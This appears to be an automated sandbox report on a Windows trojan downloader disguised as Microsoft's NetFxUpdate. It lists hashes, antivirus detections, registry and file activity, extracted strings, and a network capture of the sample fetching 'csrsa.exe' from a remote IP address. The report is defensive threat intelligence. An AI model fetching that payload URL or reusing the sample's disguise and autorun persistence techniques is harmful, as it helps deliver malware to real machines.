Analysis Date: 2015-01-20 14:44:26
MD5: 724a9bb9b8810c95e5f74a93543c9e88
SHA1: b7f5ac31d8a46769d0e00671ffcd14fb4021e3e7

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 465b02f9605a3a3b9b95975c47f9b25c sha1: 5bc8fe127f947a5ea166a37ff57083d01a68dc1a size: 61440
Section .data md5: 67b469c7cc91d2bff416249a814e3b01 sha1: 7f761d445199872f25559383d32ded1a4d865283 size: 4096
Section .rsrc md5: cca2bffa2581251e672ff9496efd38a2 sha1: 8765781dbf9a3f0b03e63561b23482a9aaa75ebf size: 4096
Section .text md5: 003e4ffc050a5705edb09203498586ed sha1: 0cd8ce455c51792d7f36134fd8efacf03e6ef3fd size: 8192
Timestamp: 2006-08-04 22:36:12
Pdb path: netfxupdate.pdb
Version: LegalCopyright: Copyright (C) 2004
InternalName: NetFxUpdate
FileVersion: 1,0,3705,3
CompanyName: Microsoft
ProductName: NetFxUpdate Application
ProductVersion: 1, 0, 3705, 0
FileDescription: NetFxUpdate Application
OriginalFilename: NetFxUpdate.exe
PEhash: bafbdabe48ac7b424d67a6e02b43bdb443641a2d
IMPhash: c93fb3b3067c891bb5db2cf4ac13c7cc
AV 360 Safe: Virus.Win32.TuFik.C
AV Ad-Aware: Win32.Tufik.P
AV Alwil (avast): Tufik:Win32:Tufik
AV Arcabit (arcavir): Win32.Tufik.P
AV Authentium: W32/Tufik.A.gen!Eldorado
AV Avira (antivir): TR/Dldr.Genome.agor
AV BullGuard: Win32.Tufik.P
AV CA (E-Trust Ino): Win32/tufik.J
AV CAT (quickheal): W32.Tufik.gen
AV ClamAV: Trojan.Downloader-98394
AV Dr. Web: Trojan.DownLoader.4268
AV Emsisoft: Win32.Tufik.P
AV Eset (nod32): Win32/Tufik.NAA virus
AV Fortinet: W32/Fujacks.BF!tr
AV Frisk (f-prot): W32/Tufik.A.gen!Eldorado
AV F-Secure: Win32.Tufik.P
AV Grisoft (avg): Win32/Tufik.A
AV Ikarus: Virus.Win32.Tufik
AV K7: Trojan-Downloader ( 00132cab1 )
AV Kaspersky: Virus.Win32.Pioneer.ak
AV MalwareBytes: no_virus
AV Mcafee: W32/Tufik
AV Microsoft Security Essentials: Virus:Win32/Tufik.D
AV MicroWorld (escan): Win32.Tufik.P
AV Rising: Win32.Tufik.p
AV Sophos: W32/Tufik-Fam
AV Symantec: W32.Tufik.B!inf
AV Trend Micro: PE_TUFIK.JK
AV VirusBlokAda (vba32): Virus.Expiro.ad

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\wuauclt.exe.mdmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\wuauclt.exe.hdmp
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Setup.exe
Creates File: \Device\Afd\AsyncConnectHlp
Creates Mutex: open
Winsock DNS: 8.5.1.46
Winsock URL: http://8.5.1.46/csrsa.exe

Network Details:

DNS: 85773.com
Type: A
8.5.1.46
HTTP GET: http://8.5.1.46/csrsa.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 8.5.1.46:80

Raw Pcap
0x00000000 (00000)   47455420 2f637372 73612e65 78652048   GET /csrsa.exe H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20382e35 2e312e34 360d0a43   ost: 8.5.1.46..C
0x000000b0 (00176)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000c0 (00192)   416c6976 650d0a0d 0a                  Alive....


Strings
~1
0\
. 00-+ 
.
00000000
1, 0, 3705, 0
1,0,3705,3
CompanyName
Copyright (C) 2004
FileDescription
FileVersion
                                 H
         (((((                  H
         h((((                  H
        h((((                  H
InternalName
LegalCopyright
Microsoft
"Microsoft .NET Framework %s UpdatecUpdates assemblies and generates native images for the Microsoft .NET Framework %s after rebooting.
NetFxUpdate
NetFxUpdate Application
NetFxUpdate.exe
(null)
OriginalFilename
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
"+^ +]
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
[%04d-%02d-%02d %02d:%02d:%02d] 
A buffer overrun has been detected which has corrupted the program's
advapi32.dll
ADVAPI32.dll
A security error of unknown cause has been detected which has
August
.?AVCSException@@
.?AVtype_info@@
btFHt+
Buffer overrun detected!
ChangeServiceConfig2A
CloseHandle
CloseServiceHandle
Command-line arguments: %s
continue execution and must now be terminated.
ControlService
CorExitProcess
corrupted the program's internal state.  The program cannot safely
CreateEventA
CreateFileA
CreateMutexA
CreateProcessA
CreateServiceA
CreateThread
Creating mutex '%s' without owning it.
`.data
dddd, MMMM dd, yyyy
December
DeleteCriticalSection
DeleteService
DOMAIN error
EnterCriticalSection
Error (0x%08x): %s
Error: an internal error has occured.
Error: A timeout occured while waiting for the system to be ready.
Error: Could not allocate %d bytes for the command buffer.
Error: Could not allocate %d bytes for the value buffer.
Error: Could not allocate the registry value buffer.
Error: Could not allocate the version buffer.
Error: Could not delete the service for %s.
Error: Could not execute the command.
Error: Could not get the module file name.
Error: Could not open '%s' for read access.
Error: Could not read from file.
Error: Could not start the processing thread.
Error: Could not start the service control dispatcher.
Error: Could not start the service for %s.
Error: Failed to get the command-line arguments.
Error: Failed to process the command-line arguments.
Error: Failed to write auto-run registry keys.
Error: Function OpenSCManager failed.
Error: Invalid command-line arguments.
Error: The command-line parameters are incorrect.
Error: The .NET Framework version was not copied.
Error: The registry value '%s' was not deleted.
Error: The service control handler was not registered.
Error: The service could not be started for %s.
Error: The service %s could not be opened.
Error: The service %s could not be registered.
Error: The service was already running for %s.
Error: the synchronization events were not initialized.
Executing '%s'...
ExitProcess
F,98uX
February
(f@f;F
- floating point not loaded
FlushFileBuffers
FormatMessageA
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
GAC + NI NID
gacutil.exe
GetACP
GetActiveWindow
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetExitCodeProcess
GetFileType
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetLocalTime
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemDirectoryA
GetSystemInfo
GetSystemTimeAsFileTime
GetTempPathA
GetTickCount
GetUserObjectInformationA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
Global\
`h````
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
HH:mm:ss
HHtjHHtF
HHtZHHtV
InitializeCriticalSection
InitializeCriticalSectionAndSpinCount
InterlockedExchange
internal state.  The program cannot safely continue execution and must
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
JanFebMarAprMayJunJulAugSepOctNovDec
January
kernel32.dll
KERNEL32.dll
kuLoadLibraryA
LCMapStringA
LCMapStringW
LeaveCriticalSection
LoadLibraryA
LoadStringA
LocalFree
Lock '%s' was acquired.
Lock '%s' was not acquired: %d
Looking for pending file renames for %s.
MessageBoxA
Microsoft Visual C++ Runtime Library
MM/dd/yy
Monday
mscoree.dll
MultiByteToWideChar
Mutex released.
NetFxUpdate_
netfxupdate.pdb
No pending file renames were found.
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
now be terminated.
(null)
October
Opening the service for %s...
OpenSCManagerA
OpenServiceA
Pausing for %d seconds...
PendingFileRenameOperations
Pending file renames were found.
Please contact the application's support team for more information.
PPPPPPPP
ppxxxx
Processing [HKEY_LOCAL_MACHINE\%s]...
Processing '%s'...
Program: 
<program name unknown>
- pure virtual function call
QPPPPP
QQ.exe
QQSVW3
QQSVWd
QueryPerformanceCounter
RaiseException
ReadFile
Reading command-line arguments from [HKEY_LOCAL_MACHINE\%s]...
Read '%s' from the registry.
Recycler
RegCloseKey
RegDeleteValueA
RegEnumValueA
Registering the service control handler for %s...
Registering the service for %s...
RegisterServiceCtrlHandlerA
RegisterServiceCtrlHandlerExA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseMutex
Removed successfully.
Removing auto-run registry key(s) for %s...
Removing [HKEY_LOCAL_MACHINE\%s] %s...
[rename]
ResetEvent
RtlUnwind
Running Windows%s %d.%d.%d %s.
runtime error 
Runtime Error!
Saturday
September
ServicesActive
SetEndOfFile
SetEvent
SetFilePointer
SetHandleCount
SetLastError
SetServiceStatus
SetStdHandle
SetUnhandledExceptionFilter
shell32
SING error
SOFTWARE\Microsoft\.NETFramework\PendingUpdates
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Starting the service for %s...
StartServiceA
StartServiceCtrlDispatcherA
Stopping and un-registering the service for %s...
\StringFileInfo\00000000\FileDescription
\StringFileInfo\00000000\FileVersion
Sunday
SunMonTueWedThuFriSat
%s v%s
SWjD_W
sXS;7|D;w
SYSTEM\CurrentControlSet\Control\Session Manager
t2WWVPVSW
TerminateProcess
.text 
@.text 
The description was registered for service %s.
The process returned %d.
The service for %s was deleted successfully.
The service for %s was started successfully.
The service %s was opened successfully.
The service %s was registered successfully.
The system drive is formatted as %s.
This application has requested the Runtime to terminate it in an unusual way.
!This program cannot be run in DOS mode.
Thursday
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
t!SS9]
t#SSUP
t.;t$$t(
Tuesday
t$$VSS
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
Unknown security failure detected!
URLDownloadToFileA
Urlmon
user32
user32.dll
USER32.dll
uShellExecuteA
Using default command-line arguments '%s'.
u"WWWW
VC20XC00U
vCloseHandle
vCreateFileA
vCreateFileMappingA
vCreateMutexA
vCreateThread
VerQueryValueA
VERSION.dll
vFindClose
vFindFirstFileA
vFindNextFileA
vGetDriveTypeA
vGetFileSize
vgethostbyname
vGetLastError
vGetLocalTime
vGetLogicalDriveStringsA
vGetTempPathA
vGlobalAlloc
vGlobalFree
vinet_ntoa
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
vlstrcatA
vlstrcmpA
vlstrcpyA
vlstrlenA
vMapViewOfFile
v	N+D$
vSetEndOfFile
vSetFilePointer
vSleep
vUnmapViewOfFile
vWriteFile
vWs2_32
vWSAStartup
WaitForMultipleObjects
WaitForSingleObject
Warning: a request was made to pause the service.
Warning: a request was made to stop the service.
Warning: File '%s' may not exist.
Warning: No processing when pending file renames exist.
Warning: The key [HKEY_LOCAL_MACHINE\%s] was not found.
Warning: The process was terminated. The process will be restarted after a reboot.
Warning: The process was terminated. The process will be restarted when the service continues.
Warning: The service could not be stopped. It will be removed after a reboot.
Warning: The service for %s was already marked for deletion.
Warning: The service %s was already registered.
Warning: The value does not exist.
Wednesday
WideCharToMultiByte
WINDOW
\wininit.ini
WriteFile
Writing auto-run registry key for %s...
Writing command-line arguments '%s' to [HKEY_LOCAL_MACHINE\%s...
Writing '%s' to [HKEY_LOCAL_MACHINE\%s] %s...
Wrote auto-run registry keys successfully.
Wrote command-line arguments successfully.
wRtlMoveMemory
wshlwapi
wStrStrIA
WWWWVSW
_^][YY